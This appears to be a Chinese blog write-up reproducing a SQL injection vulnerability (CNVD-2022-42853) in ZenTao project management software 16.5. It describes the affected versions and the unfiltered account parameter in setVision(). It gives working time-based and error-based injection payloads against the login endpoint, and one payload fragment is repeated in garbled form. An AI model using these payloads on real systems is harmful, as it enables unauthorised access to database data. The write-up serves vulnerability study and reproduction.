禅道V16.5SQL注入漏洞(CNVD-2022-42853)
一、简介
禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行,攻击者可利用漏洞获取数据库敏感信息。
复现码源下载:https://www.zentao.net/dynamic/zentaopms16.0.beta1-80443.html
参考:https://github.com/ce-automne/CNVD-2022-42853
二、影响范围
禅道企业版 6.5
禅道旗舰版 3.0
禅道开源版 16.5
禅道开源版 16.5.beta1
三、漏洞分析
利用网上公开的报错注入poc,发现漏洞点
具体函数为**setVision()
**
对输入的用户名没有任何过滤就直接传入SQL语句中执行
而且$account
变量支持$_GET
和$_POST
两种方法传参,可以在前台sql注入
paylad
延时:
http://ip:port/index.php?account=admin' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)-- b
报错(POST传入)
POST /zentao/user-login.html HTTP/1.1
payload:account=admin'+and++updatexml(1,concat(0x1,user()),1)+and+'1'='1
注入成功
cat(0x1,user()),1)+and+‘1’='1
注入成功
![在这里插入图片描述](https://img-blog.csdnimg.cn/3ebfd9658d7d4907a5109729460f9955.png)